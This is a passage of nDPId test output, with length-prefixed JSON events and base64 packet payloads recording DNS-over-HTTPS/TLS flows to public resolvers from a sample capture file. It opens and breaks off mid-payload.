Qtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="}
01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZ